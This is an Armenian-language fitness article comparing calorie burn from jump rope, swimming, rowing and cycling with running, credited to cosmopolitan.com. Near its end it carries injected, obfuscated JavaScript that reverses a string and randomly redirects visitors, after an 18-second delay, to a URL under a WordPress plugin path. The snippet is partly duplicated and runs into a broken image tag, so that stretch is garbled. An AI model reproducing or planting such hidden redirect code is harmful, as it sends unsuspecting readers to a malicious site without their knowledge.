
Վարժություններն ավելի շատ կալորիաներ են այրում, քան վազքը
Եթե ցանկանում եք ազատվել ավելորդ ճարպից, ապա պետք է հնարավորինս շատ կալորիանել այրել: Ընդունված է համարել, որ կալորիաներն այրելու ամենաարդյունավետ միջոցը վազքն է: Սակայն պարզվում է, որ դա այնքան էլ ճիշտ չէ, և ավելորդ կալորիաներն այրելու համար վազքից ավելի արդյունավետ միջոցներ կան:
Ձեզ ենք ներկայացնում մի քանի վարժություններ, որոնց շնորհիվ կարելի է ավելի շատ կալորիաներ այրել, քան վազքի միջոցով:
Պարանով ցատկ
Պարզվում է, որ պարանով ցատկելը միայն խաղահրապարակում վազվզող երեխաների համար չէ: Այն արդյունավետ վարժություն է նաև մեծահասակների համար: Մասնագետների կարծիքով պարանով ցատկելու միջոցով կարելի է մեկ ժամում մինչև 1000 կալորիա այրել՝ կախված ցատկերի արագությունից և մարմնի քաշից (ավելի ծանր քաշ ունեցող մարդիկ ավելի շատ կալորիաներ են այրում):
Լող
Լողը հնարավորություն է տալիս «կտրվել» աշխարհից, մինչ ձեր մարմինն ամբողջությամբ աշխատում է: Լողը հիանալի տարբերակ է հատկապես նրանց համար, ովքեր չեն կարող այլ աերոբիկ վարժություններ անել, քանի որ այն որևէ ճնշում չի գործադրում հոդերի վրա: Մասնագետները վստահ են, որ լողի միջոցով հնարավոր է մեկ ժամում մոտ 1000 կալորիա այրել:
Թիավարում
Թիավարումը հիանալի միջոց է կալորիաներն այրելու համար, քանի որ թիավարելու ընթացքում մարմնի ինը խոշոր մկանային խմբերը միաժամանակ աշխատում են: Թիավարելու միջոցով կարելի է մոտ 700 կալորիա այրել մեկ ժամում:
Հեծանվային վազք
Անկախ արագությունից՝ հեծանիվ վարելն օգտակար է սրտի և արյան անոթների համար: Միջին արագությամբ հեծանիվ վարելու դեպքում կարելի է մոտ 364 կալորիա այրել մեկ ժամում:
$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tock_482869951-1024×683.jpg” alt=”” width=”698″ height=”465″ />
Աղբյուր՝ cosmopolitan.com